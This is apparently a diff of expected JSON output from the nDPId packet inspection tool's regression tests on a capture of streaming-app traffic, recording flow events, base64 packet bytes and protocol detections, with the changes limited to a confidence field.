00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":406,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1470104379954,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379954,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADYGguxquSNuwKhzCABQwcaIrnkOwQ72oYASchC\/lAAAAgQFtAEBBAIBAwMH"} 
-00805{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":409,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379916,"flow_last_seen":1470104379956,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":357,"flow_tot_l4_payload_len":357,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1470104379956,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49606,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"jp.kankan.1kxun.mobi","url":"jp.kankan.1kxun.mobi\/api\/movies\/mp4script\/10410?definition=true","code":0,"content_type":"","user_agent":""}} +00805{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":409,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379916,"flow_last_seen":1470104379956,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":357,"flow_tot_l4_payload_len":357,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1470104379956,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49606,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"jp.kankan.1kxun.mobi","url":"jp.kankan.1kxun.mobi\/api\/movies\/mp4script\/10410?definition=true","code":0,"content_type":"","user_agent":""}} 
00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":458,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104380188,"flow_last_seen":1470104380188,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104380188,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"218.244.135.170","src_port":49607,"dst_port":9099,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":458,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1470104380188,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104380188,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UhRAAIAGEmDAqHMI2vSHqsHHI4t8ty1+AAAAAIACIAAqAAAAAgQE7AEDAwgBAQQC"} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":459,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1470104380188,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104380188,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UhRAAIAGEmDAqHMI2vSHqsHHI4t8ty1+AAAAAIACIAAqAAAAAgQE7AEDAwgBAQQC"} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":460,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1470104380300,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104380300,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0c30AAHAGQPfa9IeqwKhzCCOLwccogsRifLctf4ASQAAcSgAAAgQFtAEDAwABAQQC"} 
-01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":463,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104380188,"flow_last_seen":1470104380302,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104380302,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"218.244.135.170","src_port":49607,"dst_port":9099,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"218.244.135.170","url":"218.244.135.170:9099\/api\/qqlive_ckey\/get?vid=y0013xaeeyo&platform=10902","code":0,"content_type":"","user_agent":"Mozilla\/5.0"}} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":463,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104380188,"flow_last_seen":1470104380302,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104380302,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"218.244.135.170","src_port":49607,"dst_port":9099,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"218.244.135.170","url":"218.244.135.170:9099\/api\/qqlive_ckey\/get?vid=y0013xaeeyo&platform=10902","code":0,"content_type":"","user_agent":"Mozilla\/5.0"}} 00624{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":468,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1470104380603,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1470104380603,"pkt":"AQBef\/\/6zD2CHu7jCABFAAClQLUAAAQRv8HAqAUv7\/\/\/+utrB2wAkWQETS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1hbjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="} 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":472,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104380737,"flow_last_seen":1470104380737,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1470104380737,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":54420,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":472,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1470104380737,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"thread_ts_msec":1470104380737,"pkt":"TF4M6gNlABxCjnAxCABFAAA9UhkAAIARpNbAqHMICAgICNSUADUAKZhJpTgBAAABAAAAAAAAAnZ2BXZpZGVvAnFxA2NvbQAAAQAB"} 
-00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":472,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104380737,"flow_last_seen":1470104380737,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1470104380737,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":54420,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.QQ","breed":"Fun","category":"Chat"},"dns": {"query":"vv.video.qq.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":472,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104380737,"flow_last_seen":1470104380737,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1470104380737,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":54420,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.QQ","breed":"Fun","category":"Chat"},"dns": {"query":"vv.video.qq.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":473,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1470104380737,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"thread_ts_msec":1470104380737,"pkt":"TF4M6gNlABxCjnAxCABFAAA9UhkAAIARpNbAqHMICAgICNSUADUAKZhJpTgBAAABAAAAAAAAAnZ2BXZpZGVvAnFxA2NvbQAAAQAB"} 00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":474,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1470104380772,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":116,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":116,"pkt_l4_len":82,"thread_ts_msec":1470104380772,"pkt":"ABxCjnAxTF4M6gNlCABFAABmlL4AAC4RtAgICAgIwKhzCAA11JQAUqbTpTiBgAABAAIAAAAAAnZ2BXZpZGVvAnFxA2NvbQAAAQABwAwABQABAAABKwANCnByb3h5LXNldDHAD8AtAAEAAQAAASsABMvNl+o="} -00772{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":474,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1470104380737,"flow_last_seen":1470104380772,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":74,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1470104380772,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":54420,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.QQ","breed":"Fun","category":"Chat"},"dns": {"query":"vv.video.qq.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"203.205.151.234"}} 
+00772{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":474,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1470104380737,"flow_last_seen":1470104380772,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":74,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1470104380772,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":54420,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.QQ","breed":"Fun","category":"Chat"},"dns": {"query":"vv.video.qq.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"203.205.151.234"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":475,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104380773,"flow_last_seen":1470104380773,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104380773,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"203.205.151.234","src_port":49608,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":475,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1470104380773,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104380773,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UhtAAIAGEUDAqHMIy82X6sHIAFAfZnbXAAAAAIACIABgGQAAAgQE7AEDAwgBAQQC"} 
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":476,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1470104380773,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104380773,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UhtAAIAGEUDAqHMIy82X6sHIAFAfZnbXAAAAAIACIABgGQAAAgQE7AEDAwgBAQQC"} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":477,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1470104380801,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104380801,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADMGsFvLzZfqwKhzCABQwcglYwNrH2Z22IASFoBABAAAAgQFoAEBBAIBAwMK"} -00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":480,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104380773,"flow_last_seen":1470104380807,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":204,"flow_tot_l4_payload_len":204,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1470104380807,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"203.205.151.234","src_port":49608,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"},"http": {"hostname":"vv.video.qq.com","url":"vv.video.qq.com\/getvinfo","code":0,"content_type":"","user_agent":"Mozilla\/5.0"}} 
+00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":480,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104380773,"flow_last_seen":1470104380807,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":204,"flow_tot_l4_payload_len":204,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1470104380807,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"203.205.151.234","src_port":49608,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"},"http": {"hostname":"vv.video.qq.com","url":"vv.video.qq.com\/getvinfo","code":0,"content_type":"","user_agent":"Mozilla\/5.0"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":487,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104380890,"flow_last_seen":1470104380890,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104380890,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"42.120.51.152","src_port":49609,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":487,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1470104380890,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104380890,"pkt":"TF4M6gNlABxCjnAxCABFAAA0Uh9AAIAGFuTAqHMIKngzmMHJH5CKzmkHAAAAAIACIADo5wAAAgQE7AEDAwgBAQQC"} 
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":488,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1470104380890,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104380890,"pkt":"TF4M6gNlABxCjnAxCABFAAA0Uh9AAIAGFuTAqHMIKngzmMHJH5CKzmkHAAAAAIACIADo5wAAAgQE7AEDAwgBAQQC"} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":489,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104380909,"flow_last_seen":1470104380909,"flow_idle_time":200000,"flow_min_l4_payload_len":317,"flow_max_l4_payload_len":317,"flow_tot_l4_payload_len":317,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1470104380909,"l3_proto":"ip4","src_ip":"192.168.10.110","dst_ip":"255.255.255.255","src_port":60480,"dst_port":62976,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00876{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":489,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1470104380909,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":359,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":359,"pkt_l4_len":325,"thread_ts_msec":1470104380909,"pkt":"\/\/\/\/\/\/\/\/XNmY3fXzCABFAAFZAABAAEARbn7AqApu\/\/\/\/\/+xA9gABRTgx\/\/8AAKAAXNmY3fXzwKgKbgAAAgAnAUROUy0xMTAwLTA0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABOQVMAAAAAAAAAAAAAVVqvihgAAABVWsE9WwAAAFVasDEuMDJiMTAAEXgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAXNmY3fXzM0ExAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGRsaW5rLURERjVGMwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAqApu\/\/8AAExBTjEAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} 
00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":492,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":3,"flow_last_seen":1470104380966,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1470104380966,"pkt":"ABxCjnAxTF4M6gNlCABFAAAwAABAADAGuQcqeDOYwKhzCB+QwcnDIL+ais5pCHASFtCCkgAAAgQFtAEBBAI="} -01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":495,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104380890,"flow_last_seen":1470104380968,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":252,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1470104380968,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"42.120.51.152","src_port":49609,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"42.120.51.152","url":"42.120.51.152:8080\/api\/proxy?url=http%3A%2F%2Fvv.video.qq.com%2Fgetvinfo","code":0,"content_type":"","user_agent":"Mozilla\/5.0"}} 
+01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":495,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104380890,"flow_last_seen":1470104380968,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":252,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1470104380968,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"42.120.51.152","src_port":49609,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"42.120.51.152","url":"42.120.51.152:8080\/api\/proxy?url=http%3A%2F%2Fvv.video.qq.com%2Fgetvinfo","code":0,"content_type":"","user_agent":"Mozilla\/5.0"}} 00621{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":506,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1470104381115,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1470104381115,"pkt":"AQBef\/\/6\/PiuMpcsCABFAAChLEIAAAER2QjAqANf7\/\/\/+uhMB2wAjbUvTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} 
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":507,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104381217,"flow_last_seen":1470104381217,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104381217,"l3_proto":"ip4","src_ip":"192.168.5.37","dst_ip":"224.0.0.252","src_port":56366,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":507,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1470104381217,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"thread_ts_msec":1470104381217,"pkt":"AQBeAAD8CJ4BzeuNCABFAAA2U68AAAERvz7AqAUl4AAA\/NwuFOsAIuU8ydMAAAABAAAAAAAACG5vdGVib29rAAD\/AAE="} -00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":507,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104381217,"flow_last_seen":1470104381217,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104381217,"l3_proto":"ip4","src_ip":"192.168.5.37","dst_ip":"224.0.0.252","src_port":56366,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 
+00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":507,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104381217,"flow_last_seen":1470104381217,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104381217,"l3_proto":"ip4","src_ip":"192.168.5.37","dst_ip":"224.0.0.252","src_port":56366,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":508,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104381217,"flow_last_seen":1470104381217,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1470104381217,"l3_proto":"ip4","src_ip":"192.168.5.37","dst_ip":"239.255.255.250","src_port":57325,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00621{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":508,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1470104381217,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1470104381217,"pkt":"AQBef\/\/6CJ4BzeuNCABFAAChFE8AAAER7zXAqAUl7\/\/\/+t\/tB2wAjbvITS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} 
